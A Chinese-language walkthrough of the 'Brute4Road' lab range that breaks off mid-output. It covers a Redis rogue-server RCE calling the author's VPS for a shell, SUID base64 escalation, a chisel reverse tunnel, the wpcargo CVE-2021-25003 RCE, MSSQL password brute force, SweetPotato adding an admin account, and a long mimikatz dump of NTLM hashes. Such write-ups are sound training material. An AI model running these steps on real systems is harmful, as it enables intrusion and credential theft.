前言
参考:
https://fushuling.com/index.php/2023/09/03/%e6%98%a5%e7%a7%8b%e4%ba%91%e5%a2%83%c2%b7brute4road/
https://exp10it.io/2023/08/chunqiuyunjing-brute4road-writeup/
redis主从复制rce
fscan扫一下
./fscan -h 39.98.118.103 -p 1-65535
直接扫出一个 redis 未授权,主从复制rce:https://github.com/n0b0dyCN/redis-rogue-server
python3 redis-rogue-server.py --rhost 39.98.118.103 --lhost vps
第一个 ip 地址是题目地址,第二个地址是自己 vps 的地址,记得开启 21000 端口,执行成功后选择正向 shell 或反向 shell,然后输入弹的地址与端口即可
base64提权
测试提权命令
find / -user root -perm -4000 -print 2>/dev/null
很明显能用base64提权,找到 flag1 在 /home/redis/flag/ 下
base64 "/home/redis/flag/flag01" | base64 --decode
flag01: flag{53e1be23-fcbc-4371-ac73-7b8185500892}
信息收集
用 wget 下载我们需要的文件
wget vps:80/fscan注意如果没有 ifconfig 和 ip addr 的话可以读 /etc/hosts 获取内网网段
fscan 开扫
./fscan -h 172.22.2.7/24[2025-02-24 23:43:16] [SUCCESS] NetInfo 扫描结果
目标主机: 172.22.2.16
主机名: MSSQLSERVER
发现的网络接口:
IPv4地址:
└─ 172.22.2.16
[2025-02-24 23:43:16] [SUCCESS] NetInfo 扫描结果
目标主机: 172.22.2.3
主机名: DC
发现的网络接口:
IPv4地址:
└─ 172.22.2.3
[2025-02-24 23:43:16] [INFO] 系统信息 172.22.2.3 [Windows Server 2016 Datacenter 14393]
[2025-02-24 23:43:16] [SUCCESS] NetInfo 扫描结果
目标主机: 172.22.2.34
主机名: CLIENT01
发现的网络接口:
IPv4地址:
└─ 172.22.2.34
[2025-02-24 23:43:16] [INFO] 系统信息 172.22.2.16 [Windows Server 2016 Datacenter 14393]
[2025-02-24 23:43:16] [SUCCESS] 网站标题 http://172.22.2.7 状态码:200 长度:4833 标题:Welcome to CentOS
[2025-02-24 23:43:16] [SUCCESS] NetBios 172.22.2.34 XIAORANG\CLIENT01
[2025-02-24 23:43:16] [SUCCESS] 网站标题 http://172.22.2.16 状态码:404 长度:315 标题:Not Found
[2025-02-24 23:43:16] [SUCCESS] NetBios 172.22.2.16 MSSQLSERVER.xiaorang.lab Windows Server 2016 Datacenter 14393
[2025-02-24 23:43:16] [SUCCESS] NetBios 172.22.2.3 DC:DC.xiaorang.lab Windows Server 2016 Datacenter 14393
[2025-02-24 23:43:16] [SUCCESS] 匿名登录成功!
[2025-02-24 23:43:16] [SUCCESS] 172.22.2.34 CVE-2020-0796 SmbGhost Vulnerable
[2025-02-24 23:43:16] [SUCCESS] SMB认证成功 172.22.2.18:445 administrator:123456
[2025-02-24 23:43:16] [SUCCESS] NetBios 172.22.2.18 WORKGROUP\UBUNTU-WEB02
[2025-02-24 23:43:16] [INFO] SMB2共享信息 172.22.2.18:445 administrator Pass:123456 共享:[print$ IPC$]
[2025-02-24 23:43:17] [SUCCESS] 网站标题 http://172.22.2.18 状态码:200 长度:57738 标题:又一个WordPress站点
[2025-02-24 23:43:18] [INFO] SMB2共享信息 172.22.2.16:445 admin Pass:123456 共享:[ADMIN$ C$ fileshare IPC$]
[2025-02-24 23:43:24] [SUCCESS] SMB认证成功 172.22.2.16:445 admin:123456传 chisel 做代理
./chisel server -p 33322 --reverse./chisel client vpsip:33322 R:0.0.0.0:44543:socksWordpress wpcargo 漏洞
先看 wordpress 站点,wpscan 扫一下,貌似由于 vps 是国内的导致用不了 api-token,那先扫一下插件吧
proxychains -q wpscan --url http://172.22.2.18/Interesting Finding(s):
[+] Headers
| Interesting Entry: Server: Apache/2.4.41 (Ubuntu)
| Found By: Headers (Passive Detection)
| Confidence: 100%
[+] XML-RPC seems to be enabled: http://172.22.2.18/xmlrpc.php
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
| References:
| - http://codex.wordpress.org/XML-RPC_Pingback_API
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner/
| - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos/
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login/
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access/
[+] WordPress readme found: http://172.22.2.18/readme.html
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
[+] Upload directory has listing enabled: http://172.22.2.18/wp-content/uploads/
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
[+] The external WP-Cron seems to be enabled: http://172.22.2.18/wp-cron.php
| Found By: Direct Access (Aggressive Detection)
| Confidence: 60%
| References:
| - https://www.iplocation.net/defend-wordpress-from-ddos
| - https://github.com/wpscanteam/wpscan/issues/1299
[+] WordPress version 6.0 identified (Insecure, released on 2022-05-24).
| Found By: Rss Generator (Passive Detection)
| - http://172.22.2.18/index.php/feed/, <generator>https://wordpress.org/?v=6.0</generator>
| - http://172.22.2.18/index.php/comments/feed/, <generator>https://wordpress.org/?v=6.0</generator>
[+] WordPress theme in use: twentytwentytwo
| Location: http://172.22.2.18/wp-content/themes/twentytwentytwo/
| Last Updated: 2024-11-13T00:00:00.000Z
| Readme: http://172.22.2.18/wp-content/themes/twentytwentytwo/readme.txt
| [!] The version is out of date, the latest version is 1.9
| Style URL: http://172.22.2.18/wp-content/themes/twentytwentytwo/style.css?ver=1.2
| Style Name: Twenty Twenty-Two
| Style URI: https://wordpress.org/themes/twentytwentytwo/
| Description: Built on a solidly designed foundation, Twenty Twenty-Two embraces the idea that everyone deserves a...
| Author: the WordPress team
| Author URI: https://wordpress.org/
|
| Found By: Css Style In Homepage (Passive Detection)
|
| Version: 1.2 (80% confidence)
| Found By: Style (Passive Detection)
| - http://172.22.2.18/wp-content/themes/twentytwentytwo/style.css?ver=1.2, Match: 'Version: 1.2'
[+] Enumerating All Plugins (via Passive Methods)
[+] Checking Plugin Versions (via Passive and Aggressive Methods)
[i] Plugin(s) Identified:
[+] wpcargo
| Location: http://172.22.2.18/wp-content/plugins/wpcargo/
| Last Updated: 2024-08-08T17:00:00.000Z
| [!] The version is out of date, the latest version is 7.0.6
|
| Found By: Urls In Homepage (Passive Detection)
|
| Version: 6.x.x (80% confidence)
| Found By: Readme - Stable Tag (Aggressive Detection)
| - http://172.22.2.18/wp-content/plugins/wpcargo/readme.txt
[+] Enumerating Config Backups (via Passive and Aggressive Methods)
Checking Config Backups - Time: 00:00:03 <==========================================================================================> (137 / 137) 100.00% Time: 00:00:03
[i] No Config Backups Found.先从插件入手寻找漏洞
wpcargo 插件存在未授权 RCE:
https://wpscan.com/vulnerability/5c21ad35-b2fb-4a51-858f-8ffff685de4a/
https://github.com/biulove0x/CVE-2021-25003
上去先做权限维持
蚁剑代理完连上去,先看 wp-config.php
得到数据库账密
// ** Database settings - You can get this info from your web host ** //
/** The name of the database for WordPress */
define( 'DB_NAME', 'wordpress' );
/** Database username */
define( 'DB_USER', 'wpuser' );
/** Database password */
define( 'DB_PASSWORD', 'WpuserEha8Fgj9' );
/** Database hostname */
define( 'DB_HOST', '127.0.0.1' );mysql & mssql
蚁剑自带的数据操作连上 mysqli
查询的时候蚁剑莫名其妙抽风了
那用 MDUT,上传 HTTP 通道文件
也连不上,看来用不了socks,那只能命令行执行了
mysql -uwpuser -p'WpuserEha8Fgj9' -e 'use f1aagggghere;select * from flag02;'
mysql -uwpuser -p'WpuserEha8Fgj9' -e 'use f1aagggghere;select pAssw0rd from S0meth1ng_y0u_m1ght_1ntereSted;' > 1.txt
flag02: flag{c757e423-eb44-459c-9c63-7625009910d8}
S0meth1ng_y0u_m1ght_1ntereSted 是一个密码表
拿这个密码表用 fscan 爆破 172.22.2.16 的 mssql 服务
./fscan -h 172.22.2.16 -m mssql -pwdf 1.txt
爆出密码ElGNkOiC
那还是得用 MDUT 连上去,但是我懒得挂 http 代理了,于是有新项目支持socks5了:https://github.com/DeEpinGh0st/MDUT-Extend-Release
那接下来要提权了
SweetPotato提权 & RDP
开了那个 Ole 组件就能正常上传
netstat -ano发现3389开着,这里我们给自己创个用户然后 rdp 过去
C:/Users/Public/sweetpotato.exe -a "net user 0w0 qwer1234! /add"
C:/Users/Public/sweetpotato.exe -a "net localgroup administrators 0w0 /add"获得第三个flag
flag03: flag{5a85de41-3fe1-4d90-9b38-1c1100fad198}
约束性委派
查看 systeminfo 发现我们在域环境里
传一个猕猴桃上去,然后选择这个exe用管理员模式运行,可以抓域内用户密码
privilege::debug
sekurlsa::logonpasswords
mimikatz # sekurlsa::logonpasswords
Authentication Id : 0 ; 25393932 (00000000:01837b0c)
Session : RemoteInteractive from 2
User Name : 0w0
Domain : MSSQLSERVER
Logon Server : MSSQLSERVER
Logon Time : 2025/2/25 2:10:54
SID : S-1-5-21-1403470932-1755135066-2609122076-1027
msv :
[00000003] Primary
* Username : 0w0
* Domain : MSSQLSERVER
* NTLM : 6912928308e3cda903e6d75bd6091a20
* SHA1 : 4687d6f9b23b55f21825bc5157fe2cbe707c07de
tspkg :
wdigest :
* Username : 0w0
* Domain : MSSQLSERVER
* Password : (null)
kerberos :
* Username : 0w0
* Domain : MSSQLSERVER
* Password : (null)
ssp :
credman :
Authentication Id : 0 ; 25393901 (00000000:01837aed)
Session : RemoteInteractive from 2
User Name : 0w0
Domain : MSSQLSERVER
Logon Server : MSSQLSERVER
Logon Time : 2025/2/25 2:10:54
SID : S-1-5-21-1403470932-1755135066-2609122076-1027
msv :
[00000003] Primary
* Username : 0w0
* Domain : MSSQLSERVER
* NTLM : 6912928308e3cda903e6d75bd6091a20
* SHA1 : 4687d6f9b23b55f21825bc5157fe2cbe707c07de
tspkg :
wdigest :
* Username : 0w0
* Domain : MSSQLSERVER
* Password : (null)
kerberos :
* Username : 0w0
* Domain : MSSQLSERVER
* Password : (null)
ssp :
credman :
Authentication Id : 0 ; 25360137 (00000000:0182f709)
Session : Interactive from 2
User Name : DWM-2
Domain : Window Manager
Logon Server : (null)
Logon Time : 2025/2/25 2:10:53
SID : S-1-5-90-0-2
msv :
[00000003] Primary
* Username : MSSQLSERVER$
* Domain : XIAORANG
* NTLM : 7fa2072ba3c4eaf6713d45095efd01ef
* SHA1 : 0ce43b9ebfc7525c2b2a43db53845bd7a0120877
tspkg :
wdigest :
* Username : MSSQLSERVER$
* Domain : XIAORANG
* Password : (null)
kerberos :
* Username : MSSQLSERVER$
* Domain : xiaorang.lab
* Password : 08 87 42 1a 98 67 4c 81 76 11 c2 54 00 8b 81 6d a8 36 24 06 cb 8d 80 a3 66 a7 c9 0a 3c 59 33 b5 2b e6 b4 7a 46 a6 cb 8d 3d 4a c7 dc 15 80 24 bd f5 6f 91 24 db df be ac 2f dd 2f 2e 01 79 15 68 b2 d7 c0 be e8 d6 76 28 55 d2 0a 21 35 8d c8 e5 ab 0f a2 d5 34 08 df b0 85 d2 ed 5b ce d8 37 45 78 68 4f 84 56 4f b8 bd 6b 38 9e 0f 55 47 91 9d 3d ad 4a 5b 69 3f ef 2e af 06 91 87 ef da d2 de 1d 46 ed a7 37 b1 8e 99 14 ac d9 08 8b 52 f7 0b 7d 70 39 cd 16 1e 0e d0 20 71 02 86 60 9b 82 c3 5c bb 99 9a 3e e7 81 9b de fe 70 5f cc 9f 94 a7 5c 2a 69 87 60 13 02 1d 72 4a cc eb ee d9 8b c6 44 d1 0f c1 9e 14 87 45 e8 bc 24 44 b7 6e 1d ff 2d ed 60 89 22 fc b9 08 a4 28 3f 68 11 e6 fb ca ff 3e 0f b9 47 8b f1 0e 05 3b 14 8f 0c 58 ad a4
ssp :
credman :
Authentication Id : 0 ; 209311 (00000000:0003319f)
Session : Interactive from 0
User Name : MSSQLSERVER19
Domain : MSSQLSERVER
Logon Server : MSSQLSERVER
Logon Time : 2025/2/24 23:14:45
SID : S-1-5-21-1403470932-1755135066-2609122076-1022
msv :
[00000003] Primary
* Username : MSSQLSERVER19
* Domain : MSSQLSERVER
* NTLM : 9ce3bb5769303e1258f792792310e33b
* SHA1 : 1a2452c461d89c45f199454f59771f17423e72f9
tspkg :
wdigest :
* Username : MSSQLSERVER19
* Domain : MSSQLSERVER
* Password : (null)
kerberos :
* Username : MSSQLSERVER19
* Domain : MSSQLSERVER
* Password : (null)
ssp :
credman :
Authentication Id : 0 ; 209102 (00000000:000330ce)
Session : Interactive from 0
User Name : MSSQLSERVER17
Domain : MSSQLSERVER
Logon Server : MSSQLSERVER
Logon Time : 2025/2/24 23:14:45
SID : S-1-5-21-1403470932-1755135066-2609122076-1020
msv :
[00000003] Primary
* Username : MSSQLSERVER17
* Domain : MSSQLSERVER
* NTLM : 82fe575c8bb18d01df45eb54d0ebc3b4
* SHA1 : 13b87dcba388982dcc44feeba232bb50aa29c7e9
tspkg :
wdigest :
* Username : MSSQLSERVER17
* Domain : MSSQLSERVER
* Password : (null)
kerberos :
* Username : MSSQLSERVER17
* Domain : MSSQLSERVER
* Password : (null)
ssp :
credman :
Authentication Id : 0 ; 208851 (00000000:00032fd3)
Session : Interactive from 0
User Name : MSSQLSERVER15
Domain : MSSQLSERVER
Logon Server : MSSQLSERVER
Logon Time : 2025/2/24 23:14:45
SID : S-1-5-21-1403470932-1755135066-2609122076-1018
msv :
[00000003] Primary
* Username : MSSQLSERVER15
* Domain : MSSQLSERVER
* NTLM : 6eeb34930fa71d82a464ce235261effd
* SHA1 : 1dfc6d66d9cfdbaa5fc091fedde9a3387771d09b
tspkg :
wdigest :
* Username : MSSQLSERVER15
* Domain : MSSQLSERVER
* Password : (null)
kerberos :
* Username : MSSQLSERVER15
* Domain : MSSQLSERVER
* Password : (null)
ssp :
credman :
Authentication Id : 0 ; 208687 (00000000:00032f2f)
Session : Interactive from 0
User Name : MSSQLSERVER13
Domain : MSSQLSERVER
Logon Server : MSSQLSERVER
Logon Time : 2025/2/24 23:14:45
SID : S-1-5-21-1403470932-1755135066-2609122076-1016
msv :
[00000003] Primary
* Username : MSSQLSERVER13
* Domain : MSSQLSERVER
* NTLM : b808e9a53247721e84cc314c870080c5
* SHA1 : 47a42f4a6eed2b2d90f342416f42e2696052f546
tspkg :
wdigest :
* Username : MSSQLSERVER13
* Domain : MSSQLSERVER
* Password : (null)
kerberos :
* Username : MSSQLSERVER13
* Domain : MSSQLSERVER
* Password : (null)
ssp :
credman :
Authentication Id : 0 ; 208604 (00000000:00032edc)
Session : Interactive from 0
User Name : MSSQLSERVER12
Domain : MSSQLSERVER
Logon Server : MSSQLSERVER
Logon Time : 2025/2/24 23:14:45
SID : S-1-5-21-1403470932-1755135066-2609122076-1015
msv :
[00000003] Primary
* Username : MSSQLSERVER12
* Domain : MSSQLSERVER
* NTLM : 672702a4bd7524269b77dbb6b2e75911
* SHA1 : c7a828609e4912ab752b43deda8351dc1a8ea240
tspkg :
wdigest :
* Username : MSSQLSERVER12
* Domain : MSSQLSERVER
* Password : (null)
kerberos :
* Username : MSSQLSERVER12
* Domain : MSSQLSERVER
* Password : (null)
ssp :
credman :
Authentication Id : 0 ; 208522 (00000000:00032e8a)
Session : Interactive from 0
User Name : MSSQLSERVER11
Domain : MSSQLSERVER
Logon Server : MSSQLSERVER
Logon Time : 2025/2/24 23:14:45
SID : S-1-5-21-1403470932-1755135066-2609122076-1014
msv :
[00000003] Primary
* Username : MSSQLSERVER11
* Domain : MSSQLSERVER
* NTLM : cee10216b2126aa1a3f239b8201120ef
* SHA1 : 4867093fc519f7d1e91d80e3790ef8a17a7fdd18
tspkg :
wdigest :
* Username : MSSQLSERVER11
* Domain : MSSQLSERVER
* Password : (null)
kerberos :
* Username : MSSQLSERVER11
* Domain : MSSQLSERVER
* Password : (null)
ssp :
credman :
Authentication Id : 0 ; 208259 (00000000:00032d83)
Session : Interactive from 0
User Name : MSSQLSERVER08
Domain : MSSQLSERVER
Logon Server : MSSQLSERVER
Logon Time : 2025/2/24 23:14:45
SID : S-1-5-21-1403470932-1755135066-2609122076-1011
msv :
[00000003] Primary
* Username : MSSQLSERVER08
* Domain : MSSQLSERVER
* NTLM : 465034ebde60dfae889c3e493e1816bf
* SHA1 : c96428917f7c8a15ea0370716dee153842afaf02
tspkg :
wdigest :
* Username : MSSQLSERVER08
* Domain : MSSQLSERVER
* Password : (null)
kerberos :
* Username : MSSQLSERVER08
* Domain : MSSQLSERVER
* Password : (null)
ssp :
credman :
Authentication Id : 0 ; 208046 (00000000:00032cae)
Session : Interactive from 0
User Name : MSSQLSERVER06
Domain : MSSQLSERVER
Logon Server : MSSQLSERVER
Logon Time : 2025/2/24 23:14:45
SID : S-1-5-21-1403470932-1755135066-2609122076-1009
msv :
[00000003] Primary
* Username : MSSQLSERVER06
* Domain : MSSQLSERVER
* NTLM : aa206c617e2194dd76b766b7e3c92bc6
* SHA1 : 62dd8046a71c17fe7263bab86b1ca4506f8c373c
tspkg :
wdigest :
* Username : MSSQLSERVER06
* Domain : MSSQLSERVER
* Password : (null)
kerberos :
* Username : MSSQLSERVER06
* Domain : MSSQLSERVER
* Password : (null)
ssp :
credman :
Authentication Id : 0 ; 207819 (00000000:00032bcb)
Session : Interactive from 0
User Name : MSSQLSERVER04
Domain : MSSQLSERVER
Logon Server : MSSQLSERVER
Logon Time : 2025/2/24 23:14:45
SID : S-1-5-21-1403470932-1755135066-2609122076-1007
msv :
[00000003] Primary
* Username : MSSQLSERVER04
* Domain : MSSQLSERVER
* NTLM : 36bd3cceea3d413e8111b0bef32da84d
* SHA1 : 414d2c783a3fb2ba855e41c243c583bb0604fe02
tspkg :
wdigest :
* Username : MSSQLSERVER04
* Domain : MSSQLSERVER
* Password : (null)
kerberos :
* Username : MSSQLSERVER04
* Domain : MSSQLSERVER
* Password : (null)
ssp :
credman :
Authentication Id : 0 ; 207707 (00000000:00032b5b)
Session : Interactive from 0
User Name : MSSQLSERVER03
Domain : MSSQLSERVER
Logon Server : MSSQLSERVER
Logon Time : 2025/2/24 23:14:45
SID : S-1-5-21-1403470932-1755135066-2609122076-1006
msv :
[00000003] Primary
* Username : MSSQLSERVER03
* Domain : MSSQLSERVER
* NTLM : 2f7c88f56a7236f476d18ea6b5a2d33a
* SHA1 : 5bc2d09b8b0f7c11a1fc3fb2f97b713ac116b6eb
tspkg :
wdigest :
* Username : MSSQLSERVER03
* Domain : MSSQLSERVER
* Password : (null)
kerberos :
* Username : MSSQLSERVER03
* Domain : MSSQLSERVER
* Password : (null)
ssp :
credman :
Authentication Id : 0 ; 172259 (00000000:0002a0e3)
Session : Service from 0
User Name : MSSQLFDLauncher
Domain : NT Service
Logon Server : (null)
Logon Time : 2025/2/24 23:14:40
SID : S-1-5-80-3263513310-3392720605-1798839546-683002060-3227631582
msv :
[00000003] Primary
* Username : MSSQLSERVER$
* Domain : XIAORANG
* NTLM : 7fa2072ba3c4eaf6713d45095efd01ef
* SHA1 : 0ce43b9ebfc7525c2b2a43db53845bd7a0120877
tspkg :
wdigest :
* Username : MSSQLSERVER$
* Domain : XIAORANG
* Password : (null)
kerberos :
* Username : MSSQLSERVER$
* Domain : xiaorang.lab
* Password : 08 87 42 1a 98 67 4c 81 76 11 c2 54 00 8b 81 6d a8 36 24 06 cb 8d 80 a3 66 a7 c9 0a 3c 59 33 b5 2b e6 b4 7a 46 a6 cb 8d 3d 4a c7 dc 15 80 24 bd f5 6f 91 24 db df be ac 2f dd 2f 2e 01 79 15 68 b2 d7 c0 be e8 d6 76 28 55 d2 0a 21 35 8d c8 e5 ab 0f a2 d5 34 08 df b0 85 d2 ed 5b ce d8 37 45 78 68 4f 84 56 4f b8 bd 6b 38 9e 0f 55 47 91 9d 3d ad 4a 5b 69 3f ef 2e af 06 91 87 ef da d2 de 1d 46 ed a7 37 b1 8e 99 14 ac d9 08 8b 52 f7 0b 7d 70 39 cd 16 1e 0e d0 20 71 02 86 60 9b 82 c3 5c bb 99 9a 3e e7 81 9b de fe 70 5f cc 9f 94 a7 5c 2a 69 87 60 13 02 1d 72 4a cc eb ee d9 8b c6 44 d1 0f c1 9e 14 87 45 e8 bc 24 44 b7 6e 1d ff 2d ed 60 89 22 fc b9 08 a4 28 3f 68 11 e6 fb ca ff 3e 0f b9 47 8b f1 0e 05 3b 14 8f 0c 58 ad a4
ssp :
credman :
Authentication Id : 0 ; 169535 (00000000:0002963f)
Session : Service from 0
User Name : MSSQLLaunchpad
Domain : NT Service
Logon Server : (null)
Logon Time : 2025/2/24 23:14:39
SID : S-1-5-80-3477044410-376262199-2110164357-2030828471-4165405235
msv :
[00000003] Primary
* Username : MSSQLSERVER$
* Domain : XIAORANG
* NTLM : 7fa2072ba3c4eaf6713d45095efd01ef
* SHA1 : 0ce43b9ebfc7525c2b2a43db53845bd7a0120877
tspkg :
wdigest :
* Username : MSSQLSERVER$
* Domain : XIAORANG
* Password : (null)
kerberos :
* Username : MSSQLSERVER$
* Domain : xiaorang.lab
* Password : 08 87 42 1a 98 67 4c 81 76 11 c2 54 00 8b 81 6d a8 36 24 06 cb 8d 80 a3 66 a7 c9 0a 3c 59 33 b5 2b e6 b4 7a 46 a6 cb 8d 3d 4a c7 dc 15 80 24 bd f5 6f 91 24 db df be ac 2f dd 2f 2e 01 79 15 68 b2 d7 c0 be e8 d6 76 28 55 d2 0a 21 35 8d c8 e5 ab 0f a2 d5 34 08 df b0 85 d2 ed 5b ce d8 37 45 78 68 4f 84 56 4f b8 bd 6b 38 9e 0f 55 47 91 9d 3d ad 4a 5b 69 3f ef 2e af 06 91 87 ef da d2 de 1d 46 ed a7 37 b1 8e 99 14 ac d9 08 8b 52 f7 0b 7d 70 39 cd 16 1e 0e d0 20 71 02 86 60 9b 82 c3 5c bb 99 9a 3e e7 81 9b de fe 70 5f cc 9f 94 a7 5c 2a 69 87 60 13 02 1d 72 4a cc eb ee d9 8b c6 44 d1 0f c1 9e 14 87 45 e8 bc 24 44 b7 6e 1d ff 2d ed 60 89 22 fc b9 08 a4 28 3f 68 11 e6 fb ca ff 3e 0f b9 47 8b f1 0e 05 3b 14 8f 0c 58 ad a4
ssp :
credman :
Authentication Id : 0 ; 96515 (00000000:00017903)
Session : Service from 0
User Name : SSISTELEMETRY130
Domain : NT Service
Logon Server : (null)
Logon Time : 2025/2/24 23:14:32
SID : S-1-5-80-1625532266-625503396-2441596095-4129757946-3375356652
msv :
[00000003] Primary
* Username : MSSQLSERVER$
* Domain : XIAORANG
* NTLM : 7fa2072ba3c4eaf6713d45095efd01ef
* SHA1 : 0ce43b9ebfc7525c2b2a43db53845bd7a0120877
tspkg :
wdigest :
* Username : MSSQLSERVER$
* Domain : XIAORANG
* Password : (null)
kerberos :
* Username : MSSQLSERVER$
* Domain : xiaorang.lab
* Password : 08 87 42 1a 98 67 4c 81 76 11 c2 54 00 8b 81 6d a8 36 24 06 cb 8d 80 a3 66 a7 c9 0a 3c 59 33 b5 2b e6 b4 7a 46 a6 cb 8d 3d 4a c7 dc 15 80 24 bd f5 6f 91 24 db df be ac 2f dd 2f 2e 01 79 15 68 b2 d7 c0 be e8 d6 76 28 55 d2 0a 21 35 8d c8 e5 ab 0f a2 d5 34 08 df b0 85 d2 ed 5b ce d8 37 45 78 68 4f 84 56 4f b8 bd 6b 38 9e 0f 55 47 91 9d 3d ad 4a 5b 69 3f ef 2e af 06 91 87 ef da d2 de 1d 46 ed a7 37 b1 8e 99 14 ac d9 08 8b 52 f7 0b 7d 70 39 cd 16 1e 0e d0 20 71 02 86 60 9b 82 c3 5c bb 99 9a 3e e7 81 9b de fe 70 5f cc 9f 94 a7 5c 2a 69 87 60 13 02 1d 72 4a cc eb ee d9 8b c6 44 d1 0f c1 9e 14 87 45 e8 bc 24 44 b7 6e 1d ff 2d ed 60 89 22 fc b9 08 a4 28 3f 68 11 e6 fb ca ff 3e 0f b9 47 8b f1 0e 05 3b 14 8f 0c 58 ad a4
ssp :
credman :
Authentication Id : 0 ; 93643 (00000000:00016dcb)
Session : Service from 0
User Name : MsDtsServer130
Domain : NT Service
Logon Server : (null)
Logon Time : 2025/2/24 23:14:31
SID : S-1-5-80-3763098489-2620711134-3767674660-4164406483-1621732
msv :
[00000003] Primary
* Username : MSSQLSERVER$
* Domain : XIAORANG
* NTLM : 7fa2072ba3c4eaf6713d45095efd01ef
* SHA1 : 0ce43b9ebfc7525c2b2a43db53845bd7a0120877
tspkg :
wdigest :
* Username : MSSQLSERVER$
* Domain : XIAORANG
* Password : (null)
kerberos :
* Username : MSSQLSERVER$
* Domain : xiaorang.lab
* Password : 08 87 42 1a 98 67 4c 81 76 11 c2 54 00 8b 81 6d a8 36 24 06 cb 8d 80 a3 66 a7 c9 0a 3c 59 33 b5 2b e6 b4 7a 46 a6 cb 8d 3d 4a c7 dc 15 80 24 bd f5 6f 91 24 db df be ac 2f dd 2f 2e 01 79 15 68 b2 d7 c0 be e8 d6 76 28 55 d2 0a 21 35 8d c8 e5 ab 0f a2 d5 34 08 df b0 85 d2 ed 5b ce d8 37 45 78 68 4f 84 56 4f b8 bd 6b 38 9e 0f 55 47 91 9d 3d ad 4a 5b 69 3f ef 2e af 06 91 87 ef da d2 de 1d 46 ed a7 37 b1 8e 99 14 ac d9 08 8b 52 f7 0b 7d 70 39 cd 16 1e 0e d0 20 71 02 86 60 9b 82 c3 5c bb 99 9a 3e e7 81 9b de fe 70 5f cc 9f 94 a7 5c 2a 69 87 60 13 02 1d 72 4a cc eb ee d9 8b c6 44 d1 0f c1 9e 14 87 45 e8 bc 24 44 b7 6e 1d ff 2d ed 60 89 22 fc b9 08 a4 28 3f 68 11 e6 fb ca ff 3e 0f b9 47 8b f1 0e 05 3b 14 8f 0c 58 ad a4
ssp :
credman :
Authentication Id : 0 ; 91730 (00000000:00016652)
Session : Service from 0
User Name : MSSQLServerOLAPService
Domain : NT Service
Logon Server : (null)
Logon Time : 2025/2/24 23:14:31
SID : S-1-5-80-2872255330-672591203-888807865-2791174282-1554802921
msv :
[00000003] Primary
* Username : MSSQLSERVER$
* Domain : XIAORANG
* NTLM : 7fa2072ba3c4eaf6713d45095efd01ef
* SHA1 : 0ce43b9ebfc7525c2b2a43db53845bd7a0120877
tspkg :
wdigest :
* Username : MSSQLSERVER$
* Domain : XIAORANG
* Password : (null)
kerberos :
* Username : MSSQLSERVER$
* Domain : xiaorang.lab
* Password : 08 87 42 1a 98 67 4c 81 76 11 c2 54 00 8b 81 6d a8 36 24 06 cb 8d 80 a3 66 a7 c9 0a 3c 59 33 b5 2b e6 b4 7a 46 a6 cb 8d 3d 4a c7 dc 15 80 24 bd f5 6f 91 24 db df be ac 2f dd 2f 2e 01 79 15 68 b2 d7 c0 be e8 d6 76 28 55 d2 0a 21 35 8d c8 e5 ab 0f a2 d5 34 08 df b0 85 d2 ed 5b ce d8 37 45 78 68 4f 84 56 4f b8 bd 6b 38 9e 0f 55 47 91 9d 3d ad 4a 5b 69 3f ef 2e af 06 91 87 ef da d2 de 1d 46 ed a7 37 b1 8e 99 14 ac d9 08 8b 52 f7 0b 7d 70 39 cd 16 1e 0e d0 20 71 02 86 60 9b 82 c3 5c bb 99 9a 3e e7 81 9b de fe 70 5f cc 9f 94 a7 5c 2a 69 87 60 13 02 1d 72 4a cc eb ee d9 8b c6 44 d1 0f c1 9e 14 87 45 e8 bc 24 44 b7 6e 1d ff 2d ed 60 89 22 fc b9 08 a4 28 3f 68 11 e6 fb ca ff 3e 0f b9 47 8b f1 0e 05 3b 14 8f 0c 58 ad a4
ssp :
credman :
Authentication Id : 0 ; 91710 (00000000:0001663e)
Session : Service from 0
User Name : MSSQLSERVER
Domain : NT Service
Logon Server : (null)
Logon Time : 2025/2/24 23:14:31
SID : S-1-5-80-3880718306-3832830129-1677859214-2598158968-1052248003
msv :
[00000003] Primary
* Username : MSSQLSERVER$
* Domain : XIAORANG
* NTLM : 7fa2072ba3c4eaf6713d45095efd01ef
* SHA1 : 0ce43b9ebfc7525c2b2a43db53845bd7a0120877
tspkg :
wdigest :
* Username : MSSQLSERVER$
* Domain : XIAORANG
* Password : (null)
kerberos :
* Username : MSSQLSERVER$
* Domain : xiaorang.lab
* Password : 08 87 42 1a 98 67 4c 81 76 11 c2 54 00 8b 81 6d a8 36 24 06 cb 8d 80 a3 66 a7 c9 0a 3c 59 33 b5 2b e6 b4 7a 46 a6 cb 8d 3d 4a c7 dc 15 80 24 bd f5 6f 91 24 db df be ac 2f dd 2f 2e 01 79 15 68 b2 d7 c0 be e8 d6 76 28 55 d2 0a 21 35 8d c8 e5 ab 0f a2 d5 34 08 df b0 85 d2 ed 5b ce d8 37 45 78 68 4f 84 56 4f b8 bd 6b 38 9e 0f 55 47 91 9d 3d ad 4a 5b 69 3f ef 2e af 06 91 87 ef da d2 de 1d 46 ed a7 37 b1 8e 99 14 ac d9 08 8b 52 f7 0b 7d 70 39 cd 16 1e 0e d0 20 71 02 86 60 9b 82 c3 5c bb 99 9a 3e e7 81 9b de fe 70 5f cc 9f 94 a7 5c 2a 69 87 60 13 02 1d 72 4a cc eb ee d9 8b c6 44 d1 0f c1 9e 14 87 45 e8 bc 24 44 b7 6e 1d ff 2d ed 60 89 22 fc b9 08 a4 28 3f 68 11 e6 fb ca ff 3e 0f b9 47 8b f1 0e 05 3b 14 8f 0c 58 ad a4
ssp :
credman :
Authentication Id : 0 ; 63649 (00000000:0000f8a1)
Session : Interactive from 1
User Name : DWM-1
Domain : Window Manager
Logon Server : (null)
Logon Time : 2025/2/24 23:14:30
SID : S-1-5-90-0-1
msv :
[00000003] Primary
* Username : MSSQLSERVER$
* Domain : XIAORANG
* NTLM : cea3e66a2715c71423e7d3f0ff6cd352
* SHA1 : 6de4e8f192569bbc44ae94f273870635ae878094
tspkg :
wdigest :
* Username : MSSQLSERVER$
* Domain : XIAORANG
* Password : (null)
kerberos :
* Username : MSSQLSERVER$
* Domain : xiaorang.lab
